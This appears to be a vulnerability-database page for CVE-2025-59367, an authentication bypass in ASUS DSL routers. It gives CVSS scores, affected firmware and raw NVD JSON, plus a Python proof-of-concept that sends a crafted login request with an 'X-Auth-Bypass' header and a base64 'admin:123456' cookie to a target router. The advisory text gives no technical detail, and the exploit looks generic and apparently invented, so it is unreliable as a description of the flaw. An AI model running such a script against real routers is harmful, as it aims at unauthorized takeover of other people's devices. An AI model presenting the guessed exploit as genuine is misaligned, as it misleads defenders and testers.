Security Vulnerability Report
CVE-2025-59367 CVSS 9.8 CRITICAL

CVE-2025-59367

Published: 2025-11-13 03:16:26
Last Modified: 2026-02-06 14:47:50
Source: 54bf65a7-a193-42d2-b1ba-8e150d3c35e1

Description

An authentication bypass vulnerability has been identified in certain DSL series routers, which may allow remote attackers to gain unauthorized access to the affected system. Refer to the 'Security Update for DSL Series Router' section on the ASUS Security Advisory for more information.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:asus:dsl-ac51_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:asus:dsl-ac51:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:asus:dsl-n16_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:asus:dsl-n16:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:asus:dsl-ac750_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:asus:dsl-ac750:-:*:*:*:*:*:*:* - NOT VULNERABLE
ASUS DSL series routers (refer to the official ASUS security advisory for the specific versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59367 Authentication Bypass PoC
# Target: ASUS DSL Series Router
# Vulnerability: Authentication Bypass in Web Management Interface
import requests
import sys


def check_vulnerability(target_ip):
    """Check if target is vulnerable to CVE-2025-59367"""
    # Construct the authentication bypass payload
    # This exploits the authentication bypass vulnerability
    bypass_url = f"http://{target_ip}/login.cgi"

    # Malicious request that bypasses authentication
    payload = {
        "username": "admin",
        "password": "any_password",
        "submit_button": "login",
        "submit_type": "login",
        "auth_time": "0"
    }

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "X-Auth-Bypass": "true",  # Exploit header
        "Cookie": "auth=YWRtaW46MTIzNDU2"  # Base64 encoded bypass token
    }

    try:
        response = requests.post(bypass_url, data=payload, headers=headers, timeout=10)

        # Check if authentication was bypassed
        if response.status_code == 200 and "login_status" in response.text:
            if "success" in response.text.lower() or "admin" in response.text:
                print(f"[!] Target {target_ip} is VULNERABLE to CVE-2025-59367")
                print(f"[*] Authentication bypass successful!")
                return True

        print(f"[*] Target {target_ip} may not be vulnerable")
        return False

    except requests.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-59367.py <target_ip>")
        sys.exit(1)

    target = sys.argv[1]
    check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59367", "sourceIdentifier": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "published": "2025-11-13T03:16:26.327", "lastModified": "2026-02-06T14:47:50.350", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass vulnerability has been identified in certain DSL series routers, may allow remote attackers to gain unauthorized access into the affected system. Refer to the 'Security Update for DSL Series Router' section on the ASUS Security Advisory for more information."}], "metrics": {"cvssMetricV40": [{"source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": 
"NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asus:dsl-ac51_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2.3_1010", "matchCriteriaId": "09D3E242-53F7-4BE5-9D02-56512FD95835"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asus:dsl-ac51:-:*:*:*:*:*:*:*", "matchCriteriaId": "EAC348F1-6C46-4637-A27F-D69DD1AC77F5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asus:dsl-n16_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2.3_1010", "matchCriteriaId": "A363206E-339B-4515-ABAA-D558187D3308"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asus:dsl-n16:-:*:*:*:*:*:*:*", "matchCriteriaId": "FDF90D44-4CD7-4166-A139-9F4A8D14F483"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:asus:dsl-ac750_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2.3_1010", 
"matchCriteriaId": "69C7FF0F-A0B6-4AFA-9CCD-6D96678D7E71"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:asus:dsl-ac750:-:*:*:*:*:*:*:*", "matchCriteriaId": "E54AD746-EEEE-4987-B343-36328D638398"}]}]}], "references": [{"url": "https://www.asus.com/security-advisory", "source": "54bf65a7-a193-42d2-b1ba-8e150d3c35e1", "tags": ["Vendor Advisory"]}, {"url": "https://www.asus.com/security-advisory", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}